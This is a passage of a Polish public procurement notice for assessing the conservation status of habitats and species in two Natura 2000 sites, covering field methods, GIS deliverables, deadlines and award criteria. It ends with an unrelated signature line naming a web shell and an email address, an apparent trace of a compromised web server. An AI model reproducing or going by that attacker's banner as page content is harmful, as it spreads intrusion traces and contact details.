5. Zamawiający wymaga dostarczenia wyników oceny stanu ochrony na poszczególnych stanowiskach w formie formularzy obserwacji terenowych opisanych w przewodnikach metodycznych opracowanych dla potrzeb Państwowego Monitoringu Środowiska i dostępnych pod adresem internetowym http://siedliska.gios.gov.pl/index.php/metodyka. Dla gatunków wskazanych w ust. 1 wykonawca dostarczy formularze obserwacji terenowych dla wszystkich stanowisk wymienionych w tabeli nr 1, nawet tych, na których nie odnotowano ich występowania podczas realizacji przedmiotu zamówienia.
Wykonawca sporządzi punktową warstwę wektorową z lokalizacją wszystkich stanowisk badawczych; dla transektów wymagane jest podanie punktu początkowego, środkowego i końcowego. Tabela atrybutów musi zawierać: kod siedliska przyrodniczego/gatunku, współrzędne geograficzne w układzie PL-1992, ocenę stanu ochrony trzech parametrów (FV, U1, U2, lub XX) oraz łączną ocenę stanu ochrony (FV, U1, U2 lub XX).
Elementem składowym formularzy obserwacji terenowych jest lista aktualnych oddziaływań; wykonawca uzupełni tę listę o oddziaływania potencjalne. Dla każdego ze zidentyfikowanych oddziaływań należy podać kod, zgodnie z załącznikiem nr 5 do Instrukcji wypełniania Standardowego Formularza Danych obszaru Natura 200. Wersja 2012.1 dostępnego pod adresem internetowym http://natura2000.gdos.gov.pl/strona/nowy-element-3 oraz jego szczegółowy opis. Identyfikując oddziaływania należy wziąć pod uwagę przede wszystkim te o charakterze zagrożeń, z podziałem na wewnętrzne i zewnętrzne. Jako zagrożenie istniejące należy rozumieć czynnik aktualnie negatywnie wpływający na stan ochrony siedliska przyrodniczego, wynikający z przyczyn naturalnych lub z działalności człowieka; jako zagrożenia potencjalne należy rozumieć należy rozumieć czynnik, którego negatywny wpływ na stan ochrony siedliska przyrodniczego jest prawdopodobny w przyszłości, wynikający z przyczyn naturalnych lub z działalności człowieka.
Wykonawca dostarczy nie mniej niż jedną fotografię dla każdego z inwentaryzowanych stanowisk badawczych; dla siedliska przyrodniczego 91T0 wykonawca dostarczy nie mniej niż trzy fotografie (niezależnie od liczby stanowisk badawczych).
6. Wykonawca określi cele działań ochronnych i działania ochronne dla wymienionych w p. 1 siedlisk przyrodniczych oraz gatunków w wielkopolskiej części obszaru Natura 2000 Dolina Rurzycy PLH300017 - jeżeli z analizy oceny stanu ochrony i zidentyfikowanych zagrożeń wyniknie taka konieczność. Cele działań ochronnych muszą być sformułowane tak, aby były mierzalne i weryfikowalne, np. obniżenie zwarcia podszytu do 20%, redukcja liczebności gatunku inwazyjnego X o połowę etc. Cele powinny być powiązane z działaniami ochronnymi służącymi ich realizacji,
np. cel: obniżenie zwarcia podszytu do 20% - działanie ochronne: wycięcie krzewów na powierzchni 2,5 ha. Jednym z podstawowych atrybutów celów działań ochronnych powinna być także ich realność, czyli możliwość osiągnięcia w okresie obowiązywania planu zadań ochronnych dla obszaru Natura 2000 Dolina Rurzycy PLH300017, tj. do
7 lipca 2024 r.
Działania ochronne należy sformułować jako konkretną czynność do wykonania wraz z podaniem: miejsca i terminu wykonania, uwarunkowań technicznych (np. sposobu koszenia) oraz szacunkowego kosztu (jednostkowego, np. w przeliczeniu na 1 ha powierzchni siedliska przyrodniczego oraz łącznego - w okresie obowiązywania planu zadań ochronnych dla obszaru Natura 2000 Dolina Rurzycy PLH300017). Działanie ochronne musi być efektywne - nakierowane na realizację określonego celu działań ochronnych i w świetle dostępnej wiedzy gwarantujące jego osiągnięcie.
7. Wykonawca wykona prace terenowe dla potrzeb przedmiotu zamówienia zgodnie z metodyką opracowaną dla potrzeb Państwowego Monitoringu Środowiska; dla poszczególnych siedlisk przyrodniczych i gatunków zostały opracowane odrębne metodyki dostępne pod adresem internetowym http://siedliska.gios.gov.pl/index.php/metodyka.
8. W przypadku braku stwierdzenia w obszarze Natura 2000 siedliska przyrodniczego i/lub gatunku, o których mowa w p. 1 należy dostarczyć warstwy wektorowe dokumentujące miejsca ich poszukiwań oraz - o ile to możliwe - wyjaśnić przyczynę zaniku stanowisk siedliska przyrodniczego/gatunku w obszarze Natura 2000, w szczególności podać, czy nastąpił on z przyczyn naturalnych, czy antropogenicznych i czy w świetle dostępnej wiedzy można było mu przeciwdziałać.
9. Zamawiający zastrzega sobie prawo bieżącej kontroli realizacji przedmiotu zamówienia, w tym kontroli w terenie.
Termin wykonania zamówienia
Przedmiot zamówienia należy wykonać do 15 września 2016 r.
Forma przedmiotu zamówienia
1. Opracowanie tekstowe - wydruk zaopatrzony w sztywne okładki (przednią i tylną), oprawiony w sposób uniemożliwiający wydostawanie się kartek; na stronie tytułowej należy zawrzeć co najmniej następujące informacje: nazwę wykonawcy, nazwę przedmiotu zamówienia, nr i datę umowy, na podstawie której wykonano przedmiot zamówienia, informację o tym, że realizacja przedmiotu zamówienia została sfinansowana ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Poznaniu (WFOŚiGW) wraz z logo WFOŚiGW (link do pobrania logo WFOŚiGW - http://www.wfosgw.poznan.pl/informacje-o-funduszu/materialy-do-pobrania.html) oraz datę wykonania (dzień, miesiąc i rok). Zamawiający wymaga dostarczenia 2 egzemplarzy opracowania tekstowego.
2. Opracowanie w wersji elektronicznej obejmujące zapisane na nośniku danych (płyta CD-R, DVD-R itp.):
a) wektorowe warstwy dokumentujące rozmieszczenie stanowisk badawczych oraz rozmieszczenie występowania płatów siedliska przyrodniczego 91T0 (format SHP);
b) elektroniczną wersję opracowania tekstowego (format DOC lub DOCX);
c) fotografie (format JPG, rozdzielczość 300 dpi).
Elektroniczny nośnik danych musi być trwale opisany; opis powinien zawierać co najmniej: nazwę wykonawcy, nazwę przedmiotu zamówienia, datę sporządzenia.
Zamawiający wymaga dostarczenia 2 egzemplarzy nośnika danych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.70.00.00-4, 90.71.15.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ocena stanu ochrony siedlisk przyrodniczych i gatunków w obszarze Natura 2000 Ostoja koło Promna PLH300030.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dokonanie oceny stanu ochrony następujących siedlisk przyrodniczych:
- 7140 Torfowiska przejściowe i trzęsawiska (przeważnie z roślinnością z Scheuchzerio-Caricetea);
- 7210 Torfowiska nakredowe (Cladietum marisci, Caricetum buxbaumii, Schoenetum nigricantis);
- 9170 Grąd środkowoeuropejski i subkontynentalny (Galio-Carpinetum, Tilio-Carpinetum);
- 91E0 Łęgi wierzbowe, topolowe, olszowe i jesionowe (Salicetum albo-fragilis, Populetum albae, Alnenion glutinoso-incanae) i olsy źródliskowe;
- 91F0 Łęgowe lasy dębowo-wiązowo-jesionowe (Ficario-Ulmetum)
oraz gatunków:
- 1903 lipiennik Loesela Liparis loeselii,
- 1337 bóbr europejski Castor fiber,
w obszarze Natura 2000 Ostoja koło Promna PLH300030, zwanym dalej obszarem Natura 2000.
2. Ocena, o której mowa w ust. 1 jest działaniem ochronnym wynikającym z planu zadań ochronnych dla obszaru Natura 2000 (Dz. Urz. Woj. Wielkopolskiego z 2 kwietnia 2014 r. poz. 2115 ze zm.).
3. Oceny stanu ochrony należy dokonać zgodnie z załącznikiem do rozporządzenia Ministra Środowiska z dnia 17 lutego 2010 r. w sprawie sporządzania projektu planu zadań ochronnych dla obszaru Natura 2000 (Dz. U. Nr 34, poz. 186 ze zm.). Łączny stan ochrony w obszarze Natura 2000 powinien być wypadkową ocen cząstkowych dokonanych na poszczególnych stanowiskach badawczych. Liczba stanowisk badawczych musi być reprezentatywna - taka w stosunku do łącznych zasobów przedmiotu ochrony w obszarze Natura 2000, aby umożliwić rzetelną ocenę łącznego stanu ochrony w obszarze Natura 2000. Reprezentatywność musi dotyczyć także rozmieszczenia przedmiotu ochrony
w obszarze Natura 2000 - stanowiska muszą być rozproszone po całym areale występowania danego przedmiotu ochrony w obszarze Natura 2000. Dla siedlisk przyrodniczych 7140 i 7210 liczba i lokalizacja stanowisk badawczych została określona
w załączniku nr 5 do zarządzenia, o którym mowa w ust. 2.
4. Zamawiający wymaga dostarczenia wyników oceny stanu ochrony na poszczególnych stanowiskach w formie formularzy obserwacji terenowych opisanych w przewodnikach metodycznych opracowanych dla potrzeb Państwowego Monitoringu Środowiska
i dostępnych pod adresem internetowym http://siedliska.gios.gov.pl/index.php/metodyka. Dla gatunków wskazanych w ust. 1 wykonawca dostarczy formularze obserwacji terenowych dla wszystkich badanych stanowisk, nawet tych, na których nie odnotowano występowania gatunków podczas realizacji przedmiotu zamówienia.
Wykonawca sporządzi punktową warstwę wektorową z lokalizacją wszystkich stanowisk badawczych; dla transektów wymagane jest podanie punktu początkowego, środkowego
i końcowego. Tabela atrybutów musi zawierać: kod siedliska przyrodniczego/gatunku, współrzędne geograficzne w układzie PL-1992, ocenę stanu ochrony trzech parametrów (FV, U1, U2, lub XX) oraz łączną ocenę stanu ochrony (FV, U1, U2 lub XX).
Elementem składowym formularzy obserwacji terenowych jest lista aktualnych oddziaływań; wykonawca uzupełni tę listę o oddziaływania potencjalne. Dla każdego ze zidentyfikowanych oddziaływań należy podać kod, zgodnie z załącznikiem nr 5 do Instrukcji wypełniania Standardowego Formularza Danych obszaru Natura 200. Wersja 2012.1 dostępnego pod adresem internetowym http://natura2000.gdos.gov.pl/strona/nowy-element-3 oraz jego szczegółowy opis. Identyfikując oddziaływania należy wziąć pod uwagę przede wszystkim te o charakterze zagrożeń, z podziałem na wewnętrzne i zewnętrzne. Jako zagrożenie istniejące należy rozumieć czynnik aktualnie negatywnie wpływający na stan ochrony siedliska przyrodniczego/gatunku, wynikający z przyczyn naturalnych lub z działalności człowieka; jako zagrożenia potencjalne należy rozumieć należy rozumieć czynnik, którego negatywny wpływ na stan ochrony siedliska przyrodniczego/gatunku jest prawdopodobny w przyszłości, wynikający z przyczyn naturalnych lub z działalności człowieka.
Wykonawca dostarczy nie mniej niż jedną fotografię dla każdego ze stanowisk badawczych, na których wykonawca dokonał oceny stanu ochrony.
5. Wykonawca wykona prace terenowe zgodnie z metodyką opracowaną dla potrzeb przedmiotu zamówienia zgodnie z metodyką opracowaną dla potrzeb Państwowego Monitoringu Środowiska; dla poszczególnych siedlisk przyrodniczych i gatunków zostały opracowane odrębne metodyki dostępne pod adresem internetowym http://siedliska.gios.gov.pl/index.php/metodyka.
6. W przypadku braku stwierdzenia w obszarze Natura 2000 siedliska przyrodniczego i/lub gatunku, o których mowa w p. 1 należy dostarczyć warstwy wektorowe dokumentujące miejsca ich poszukiwań oraz - o ile to możliwe - wyjaśnić przyczynę zaniku stanowisk siedliska przyrodniczego/gatunku w obszarze Natura 2000, w szczególności podać, czy nastąpił on z przyczyn naturalnych, czy antropogenicznych i czy w świetle dostępnej wiedzy można było mu przeciwdziałać.
7. Zamawiający zastrzega sobie prawo bieżącej kontroli realizacji przedmiotu zamówienia, w tym kontroli w terenie.
Termin wykonania zamówienia
Przedmiot zamówienia należy wykonać do 15 września 2016 r.
Forma przedmiotu zamówienia
1. Opracowanie tekstowe - wydruk zaopatrzony w sztywne okładki (przednią i tylną), oprawiony w sposób uniemożliwiający wydostawanie się kartek; na stronie tytułowej należy zawrzeć co najmniej następujące informacje: nazwę wykonawcy, nazwę przedmiotu zamówienia, nr i datę umowy, na podstawie której wykonano przedmiot zamówienia, informację o tym, że realizacja przedmiotu zamówienia została sfinansowana ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Poznaniu (WFOŚiGW) wraz z logo WFOŚiGW (link do pobrania logo WFOŚiGW - http://www.wfosgw.poznan.pl/informacje-o-funduszu/materialy-do-pobrania.html) oraz datę wykonania (dzień, miesiąc i rok). Zamawiający wymaga dostarczenia 2 egzemplarzy opracowania tekstowego.
2. Opracowanie w wersji elektronicznej obejmujące zapisane na nośniku danych (płyta CD-R, DVD-R itp.):
a) wektorowe warstwy dokumentujące rozmieszczenie stanowisk badawczych (format SHP);
b) elektroniczną wersję opracowania tekstowego (format DOC lub DOCX);
c) fotografie (format JPG, rozdzielczość 300 dpi).
Elektroniczny nośnik danych musi być trwale opisany; opis powinien zawierać co najmniej: nazwę wykonawcy, nazwę przedmiotu zamówienia, datę sporządzenia.
Zamawiający wymaga dostarczenia 2 egzemplarzy nośnika danych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.70.00.00-4, 90.71.15.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com